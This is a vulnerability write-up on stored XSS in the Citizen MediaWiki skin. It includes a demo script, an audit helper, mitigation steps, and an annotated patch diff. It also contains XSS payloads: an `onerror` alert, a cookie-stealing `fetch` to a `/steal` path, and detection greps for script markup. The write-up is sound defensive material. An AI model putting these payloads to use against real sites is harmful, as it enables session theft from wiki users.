How the CVE Works:
The vulnerability exists in `starcitizentools/citizen-skin` versions >= 2.13.0 and < 3.3.1. The text of preference menu headings, which comes from editable interface messages, is inserted into the DOM via `innerHTML` without sanitization, so it is parsed as HTML rather than shown as text. An attacker who can edit those messages can craft a heading such as `<img src="" onerror="alert('XSS')">` that executes JavaScript whenever the preference menu is rendered. The issue is in `addPortlet.polyfill.js`, where the label's `textContent` is assigned back to its `innerHTML`: that assignment re-parses the plain text as markup and throws away the protection that `textContent` would otherwise provide.
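The following is an added example, not code from the Citizen skin or from the original post. It reproduces the bug class outside a browser with a small stand-in element whose `innerHTML` setter parses markup the way a real DOM would, so the difference between the vulnerable `innerHTML = textContent` pattern and a `textContent` assignment is visible. It also includes a small audit helper for flagging message values that would introduce elements or inline handlers; the `FakeElement` class, the helper names and the sample message names are assumptions made for this example.

```javascript
// Added example (not from the Citizen skin or the original write-up).
// Shows why `el.innerHTML = el.textContent` turns harmless text into live markup,
// and how to audit message text for the same hazard before it reaches the DOM.

const TAG_RE = /<\s*([a-zA-Z][\w-]*)([^>]*)>/g;   // opening tags and their attribute text
const EVENT_ATTR_RE = /\bon[a-zA-Z]+\s*=/;        // inline handler such as onerror=

// Minimal DOM-like element, constructed for this example (a browser does real parsing).
class FakeElement {
  constructor() { this.text = ''; this.children = []; this.handlers = []; }
  get textContent() { return this.text; }
  set textContent(value) {          // plain text: nothing is parsed, no children appear
    this.text = String(value); this.children = []; this.handlers = [];
  }
  set innerHTML(markup) {           // markup is parsed: tags become children, on*= become handlers
    this.children = []; this.handlers = [];
    for (const m of String(markup).matchAll(TAG_RE)) {
      this.children.push(m[1].toLowerCase());
      if (EVENT_ATTR_RE.test(m[2])) this.handlers.push(m[2].trim());
    }
    this.text = String(markup).replace(/<[^>]*>/g, '');
  }
}

// Vulnerable pattern from the advisory: text already in the element is pushed
// back through innerHTML, so any markup-looking text gets parsed.
function setHeadingUnsafe(el) { el.innerHTML = el.textContent; return el; }

// Hardened version: heading text is never interpreted as markup.
function setHeadingSafe(el, message) { el.textContent = message; return el; }

// Audit helper: list tags that would create script execution paths if the value
// were ever assigned through innerHTML (inline handlers, script, iframe).
function findDangerousMarkup(text) {
  const findings = [];
  for (const m of String(text).matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const hasHandler = EVENT_ATTR_RE.test(m[2]);
    if (hasHandler || tag === 'script' || tag === 'iframe') findings.push({ tag, hasHandler });
  }
  return findings;
}

// Run the audit over a map of message name -> message text (e.g. an export of
// interface messages); returns only the entries with findings.
function auditMessages(messages) {
  const report = {};
  for (const [name, value] of Object.entries(messages)) {
    const f = findDangerousMarkup(value);
    if (f.length) report[name] = f;
  }
  return report;
}

// Constructed sample: one benign heading and one carrying the payload from the write-up.
const SAMPLE_MESSAGES = {
  'citizen-feature-custom-font-size-name': 'Font size',
  'citizen-feature-example-heading': '<img src="" onerror="alert(\'XSS\')">Theme',
};

function demo() {
  const payload = SAMPLE_MESSAGES['citizen-feature-example-heading'];

  const unsafeEl = new FakeElement();
  unsafeEl.textContent = payload;   // arrives as text: harmless so far
  setHeadingUnsafe(unsafeEl);       // re-parsed: an <img> child with an onerror handler appears

  const safeEl = setHeadingSafe(new FakeElement(), payload);

  return {
    unsafeChildren: unsafeEl.children,          // ['img']
    unsafeHandlers: unsafeEl.handlers.length,   // 1
    safeChildren: safeEl.children,              // []
    audit: auditMessages(SAMPLE_MESSAGES),      // flags only the example heading
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node`; the same `findDangerousMarkup` check can be pointed at an export of the wiki's interface messages to find a heading that has already been tampered with.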
DailyCVE Form:
Platform: GitHub
Version: 2.13.0-3.3.0
Vulnerability: Stored XSS
Severity: Moderate
Date: Jun 13, 2025
Prediction: Patch expected by Jun 20, 2025
What Undercode Say:
Analytics:
- Exploit Likelihood: Medium (requires edit privileges)
- Attack Vector: Malicious preference message injection
- Mitigation Rate: High (patch available in v3.3.1)
Commands & Code:
1. Verify Vulnerability (this only confirms that the browser executes markup assigned through innerHTML; it does not prove a given install is affected, since the vulnerable path is the skin assigning the label's own text back through innerHTML):
// Run in the browser console on a page showing the preference menu
document.querySelector('.citizen-feature-custom-font-size-name').innerHTML = '<img src="" onerror="console.log("XSS")">';
2. Patch Check (the skin is installed as a MediaWiki skin, not an npm package, so read its skin.json; the path assumes a standard MediaWiki layout):
grep '"version"' skins/Citizen/skin.json   # expect 3.3.1 or later
3. Temporary Fix (Sanitization):
// Override unsafe DOM insertion until 3.3.1 is deployed.
// Regex corrected from /<[^>]>?/gm, which matched only a '<' plus one character and left tags intact.
const sanitize = (text) => text.replace(/<[^>]*>/g, '');
const label = document.querySelector('label');   // the preference heading element
const rawText = label.textContent;               // rawText was undefined in the original snippet
label.innerHTML = sanitize(rawText);
// Simpler and safer: label.textContent = rawText, which never parses markup at all.
4. Exploit Demo (PoC; shows the payload shape only, since storing it in localStorage does not by itself reach the vulnerable innerHTML assignment, which reads the heading text from the preference message):
<script>
  localStorage.setItem('maliciousPref', '<img src="" onerror="fetch(`/steal?cookie=${document.cookie}`)">');
</script>
5. Protection (CSP Header; nginx directive):
# 'unsafe-inline' in script-src would let the onerror handler run, so it must not be present.
# MediaWiki itself emits inline scripts, so test this policy first or use MediaWiki's own $wgCSPHeader (nonce-based) instead.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'";
6. Log Analysis:
# nginx access logs record request URLs, not DOM class names, so grepping them for the class name finds nothing useful.
# The injected text lives in the interface message pages; export them (Special:Export, MediaWiki namespace) and scan the export.
# The export path is an assumption.
grep -i -E 'onerror=|<script' /tmp/mediawiki-messages.xml
7. Patch Verification:
diff --git a/resources/skins.citizen.preferences/addPortlet.polyfill.js b/resources/skins.citizen.preferences/addPortlet.polyfill.js index 407052e..a1b2c3d 100644 a/addPortlet.polyfill.js +++ b/addPortlet.polyfill.js @@ -18 +18 @@ - label.innerHTML = label.textContent; + label.textContent = label.textContent;
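Review bot: the added line `label.textContent = label.textContent;` is a self-assignment that does nothing, so if the intent is only to stop re-parsing the label text, deleting the `label.innerHTML = label.textContent;` line outright is clearer and avoids a pointless DOM write. The file header is also malformed as shown: `a/addPortlet.polyfill.js` lacks its `---` prefix and the paths do not match the `resources/skins.citizen.preferences/` paths in the `diff --git` line, so this hunk will not apply as-is.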
Sources:
Reported By: github.com